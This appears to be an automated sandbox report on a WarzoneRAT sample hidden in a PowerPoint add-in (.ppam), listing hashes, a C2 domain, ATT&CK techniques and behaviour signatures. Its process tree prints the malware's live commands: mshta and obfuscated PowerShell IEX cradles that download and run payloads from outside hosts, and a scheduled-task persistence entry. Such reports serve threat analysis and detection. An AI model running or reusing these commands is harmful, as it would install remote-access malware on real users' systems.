warzonerat | 643ce9630631fdc9051b4be5b3bd9d60281885380fb2fa777379711d938c3c91

General

Target

SO-19844 EIDCO.ppam
Size

14KB
MD5

24dd86688a277a16ca013809c71ab8c0
SHA1

d3a1915ced9501a7ce269ee1ace23b4a50c8c5cd
SHA256

643ce9630631fdc9051b4be5b3bd9d60281885380fb2fa777379711d938c3c91
SHA512

89888f15eaacf0404e460830f497b2465bbaf75276e5cf5b0ae7420f50f9c00c4392479bb2cee291acbeefda71e4dd4d603b915244ed932d84608f8fc65b5119

Score

10^/10

warzonerat infostealer persistence rat

Malware Config

Extracted

Family

warzonerat

C2

pstericdd.duckdns.org:9090

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2300	396	mshta.exe	POWERPNT.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3924	3480	powershell.exe

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Blocklisted process makes network request 16 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
16	2300	mshta.exe
18	2300	mshta.exe
20	2300	mshta.exe
22	2300	mshta.exe
24	2300	mshta.exe
27	2300	mshta.exe
29	2300	mshta.exe
31	2300	mshta.exe
33	2300	mshta.exe
37	2300	mshta.exe
38	2300	mshta.exe
40	2300	mshta.exe
41	2300	mshta.exe
43	2300	mshta.exe
46	4024	powershell.exe
50	4024	powershell.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid process

4524 svchost.exe

pid	process
4524	svchost.exe

Modifies WinLogon 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

RegAsm.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	RegAsm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\zcKBn.I = "0"	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RegAsm.exe

Process spawned suspicious child process 1 IoCs

This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

Processes:

DW20.EXE

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2964	396	DW20.EXE	POWERPNT.EXE

Drops file in System32 directory 2 IoCs

Processes:

RegAsm.exe

description ioc process

File created C:\Windows\System32\rfxvmt.dll RegAsm.exe
File opened for modification C:\Windows\System32\rfxvmt.dll RegAsm.exe

description	ioc	process
File created	C:\Windows\System32\rfxvmt.dll	RegAsm.exe
File opened for modification	C:\Windows\System32\rfxvmt.dll	RegAsm.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 4024 set thread context of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 set thread context of 4372	4024	powershell.exe	aspnet_compiler.exe

Drops file in Program Files directory 2 IoCs

Processes:

RegAsm.exe

description ioc process

File created C:\Program Files\Microsoft DN1\rdpwrap.ini RegAsm.exe
File created C:\Program Files\Microsoft DN1\sqlmap.dll RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2832 2300 WerFault.exe mshta.exe

description	ioc	process
File created	C:\Program Files\Microsoft DN1\rdpwrap.ini	RegAsm.exe
File created	C:\Program Files\Microsoft DN1\sqlmap.dll	RegAsm.exe

pid	pid_target	process	target process
2832	2300	WerFault.exe	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1764 schtasks.exe

pid	process
1764	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

396 POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 34 IoCs

Processes:

POWERPNT.EXEdwwin.exepowershell.exepowershell.exeWerFault.exesvchost.exe

pid	process
396	POWERPNT.EXE
396	POWERPNT.EXE
3636	dwwin.exe
3636	dwwin.exe
3924	powershell.exe
3924	powershell.exe
4024	powershell.exe
4024	powershell.exe
3924	powershell.exe
4024	powershell.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
2832	WerFault.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
4524	svchost.exe
4524	svchost.exe
4524	svchost.exe
4524	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

624

pid	process
624

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exeWerFault.exeRegAsm.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3924	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	2832	WerFault.exe
Token: SeDebugPrivilege	4280	RegAsm.exe
Token: SeAuditPrivilege	4524	svchost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

POWERPNT.EXERegAsm.exeaspnet_compiler.exe

pid process

396 POWERPNT.EXE
4280 RegAsm.exe
4372 aspnet_compiler.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

POWERPNT.EXEDW20.EXEmshta.exepowershell.exe

description	pid	process	target process
PID 396 wrote to memory of 2300	396	POWERPNT.EXE	mshta.exe
PID 396 wrote to memory of 2300	396	POWERPNT.EXE	mshta.exe
PID 396 wrote to memory of 2964	396	POWERPNT.EXE	DW20.EXE
PID 396 wrote to memory of 2964	396	POWERPNT.EXE	DW20.EXE
PID 2964 wrote to memory of 3636	2964	DW20.EXE	dwwin.exe
PID 2964 wrote to memory of 3636	2964	DW20.EXE	dwwin.exe
PID 2300 wrote to memory of 1764	2300	mshta.exe	schtasks.exe
PID 2300 wrote to memory of 1764	2300	mshta.exe	schtasks.exe
PID 2300 wrote to memory of 4024	2300	mshta.exe	powershell.exe
PID 2300 wrote to memory of 4024	2300	mshta.exe	powershell.exe
PID 4024 wrote to memory of 4248	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4248	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4248	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4264	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4264	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4264	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4280	4024	powershell.exe	RegAsm.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe
PID 4024 wrote to memory of 4372	4024	powershell.exe	aspnet_compiler.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\SO-19844 EIDCO.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\SYSTEM32\mshta.exe
mshta http://www.bitly.com/ashjdkqodasdasdasdwdhqowdh
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2300

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@0v2x.blogspot.com/p/34.html\""
3⤵
- Creates scheduled task(s)
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/psteric.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601408.us.archive.org/12/items/psteric/1.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4024

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
4⤵
PID:4248

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
4⤵
PID:4264

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
4⤵
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
#cmd
4⤵
- Suspicious use of SetWindowsHookEx
PID:4372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2300 -s 2452
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3504
2⤵
- Process spawned suspicious child process
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\system32\dwwin.exe
C:\Windows\system32\dwwin.exe -x -s 3504
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe ((gp HKCU:\Software).cookerr)|IEX
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3924

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:4504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Winlogon Helper DLL

1

T1004

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\??\c:\program files\microsoft dn1\rdpwrap.ini
MD5
6bc395161b04aa555d5a4e8eb8320020

SHA1
f18544faa4bd067f6773a373d580e111b0c8c300

SHA256
23390dfcda60f292ba1e52abb5ba2f829335351f4f9b1d33a9a6ad7a9bf5e2be

SHA512
679ac80c26422667ca5f2a6d9f0e022ef76bc9b09f97ad390b81f2e286446f0658524ccc8346a6e79d10e42131bc428f7c0ce4541d44d83af8134c499436daae

Download Submit
\??\c:\program files\microsoft dn1\sqlmap.dll
MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\Program Files\Microsoft DN1\sqlmap.dll
MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
memory/396-117-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/396-119-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/396-118-0x00007FFF9C960000-0x00007FFF9E53D000-memory.dmp

Filesize
27.9MB

Download
memory/396-122-0x00007FFF99700000-0x00007FFF9A7EE000-memory.dmp

Filesize
16.9MB

Download
memory/396-123-0x00000251CF860000-0x00000251D1755000-memory.dmp

Filesize
31.0MB

Download
memory/396-114-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/396-116-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/396-115-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/1764-267-0x0000000000000000-mapping.dmp

Download
memory/2300-254-0x0000000000000000-mapping.dmp

Download
memory/2964-317-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/2964-314-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/2964-257-0x0000000000000000-mapping.dmp

Download
memory/2964-316-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/2964-315-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

Filesize
64KB

Download
memory/3636-263-0x0000000000000000-mapping.dmp

Download
memory/3924-288-0x0000029027F70000-0x0000029027F72000-memory.dmp

Filesize
8KB

Download
memory/3924-289-0x0000029027F73000-0x0000029027F75000-memory.dmp

Filesize
8KB

Download
memory/3924-270-0x0000029027F30000-0x0000029027F31000-memory.dmp

Filesize
4KB

Download
memory/3924-279-0x0000029028100000-0x0000029028101000-memory.dmp

Filesize
4KB

Download
memory/4024-304-0x000002467E250000-0x000002467E253000-memory.dmp

Filesize
12KB

Download
memory/4024-269-0x0000000000000000-mapping.dmp

Download
memory/4024-290-0x000002467E280000-0x000002467E282000-memory.dmp

Filesize
8KB

Download
memory/4024-291-0x000002467E283000-0x000002467E285000-memory.dmp

Filesize
8KB

Download
memory/4024-298-0x000002467E286000-0x000002467E288000-memory.dmp

Filesize
8KB

Download
memory/4024-318-0x000002467E260000-0x000002467E26D000-memory.dmp

Filesize
52KB

Download
memory/4280-329-0x0000000004460000-0x000000000459C000-memory.dmp

Filesize
1.2MB

Download
memory/4280-313-0x0000000000400000-0x000000000055E000-memory.dmp

Filesize
1.4MB

Download
memory/4280-309-0x0000000000400000-0x000000000055E000-memory.dmp

Filesize
1.4MB

Download
memory/4280-310-0x0000000000405E28-mapping.dmp

Download
memory/4280-335-0x0000000004830000-0x00000000048B4000-memory.dmp

Filesize
528KB

Download
memory/4372-324-0x0000000000405E28-mapping.dmp

Download
memory/4372-327-0x0000000000400000-0x000000000055E000-memory.dmp

Filesize
1.4MB

Download
memory/4372-330-0x00000000045F0000-0x000000000472C000-memory.dmp

Filesize
1.2MB

Download
memory/4372-334-0x0000000004850000-0x00000000048D4000-memory.dmp

Filesize
528KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads